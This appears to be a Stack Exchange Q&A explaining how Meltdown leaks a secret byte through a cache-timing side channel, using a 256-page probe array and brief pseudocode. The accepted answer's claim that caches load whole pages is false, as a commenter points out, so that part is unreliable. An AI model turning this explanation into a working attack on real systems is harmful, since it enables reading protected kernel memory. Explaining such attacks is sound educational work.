how do CPU cache side-channel attack fit into the background of Meltdown vulnerability?

Question

NOTE:I know there are similar questions out there, namely this one, but that answer is just an extraction from original paper, which didn't clarify the attack. Additionally I can see from answers there are some meaningful discussion going, so I will still post this question until further suggestion of duplicate appears.

In some literature, I have seen some vague description like:

the Meltdown vulnerability uses the cache as a side channel to leak the information found during step two. During the attack, in order to use the cache as a side-channel, the attacker must generate a significant amount of cache misses for every cache-hit, as the timing differences between the cache-miss and the cache-hit is used to gather the data.

Can somebody describe how exactly sensitive data the attacker wanted to know is determined byte by byte? and how does the page size (4096) plays a crucial part in here?

score 1 · Accepted Answer · answered Jan 15 '18 at 15:33

There's an XKCD for that!.

A page is the smallest unit of data for memory management in a virtual memory operating system. That means when data is moved in and out of caches it is moved in chunks of at least 1 page.

In the simplest case lets assume the attacker is interested in a single byte of memory. Lets say this byte is at address 0. The attacker sets up an array which is 256 pages long. Lets call this array "page_array". They then trick the processor into performing the following -

1. load address 0 into register[X]
2. load the byte at page_array[PAGE_SIZE * register[x]] into register[y].
   // PAGE_SIZE would usually be 4096

The CPU then realizes its mistake and undoes all of the above. But meanwhile the page containing page_array[PAGE_SIZE * register[x]] has been fetched and is sitting in the cache. i.e if the value were 1 you would expect -

bytes at page_array[0 to 4095] to be unlikely to be in the cache.
bytes at page_array[4096 to 8191] to be likely to be in the cache.
bytes at page_array[8192+] to be unlikely to be in the cache.

By timing access to page_array[PAGE_SIZE * i] for i in the range 0 to 255 the pages which load fastest are almost certainly in the cache. The difference is large enough that by selecting an appropriate threshold you should be able to somewhat reliably discern between a hit and a miss.

By repeating the same process multiple times and taking special steps to flush the array out of the cache before indexing into it a malicious actor can reach a point where they have the correct value with a very high statistical probability.

@Andy - The papers all state pages. I'd have to reload the Flush+Reload paper to be certain as to why. — Hector, Jan 15 '18 at 16:50
Well, I looked through the paper, and I think the author means cache lines. I quote: "Step 2 A transient instruction accesses a cache line based on the secret content of the register.". The problem here - your description, while nice and very readable, makes an impression that the whole page (4k) is loaded into cache by each cache miss instead of a cache line (64 bytes), and this is not true. — Andy, Jan 15 '18 at 17:37
@Andy - The Meltdown paper definitely references 4096 byte pages as opposed to cache lines (which would on every architecture I've seen be smaller than this). So as it stands i still believe they are referencing pages and need to re-read them to work out why. — Hector, Jan 15 '18 at 22:23

how do CPU cache side-channel attack fit into the background of Meltdown vulnerability?

1 Answers1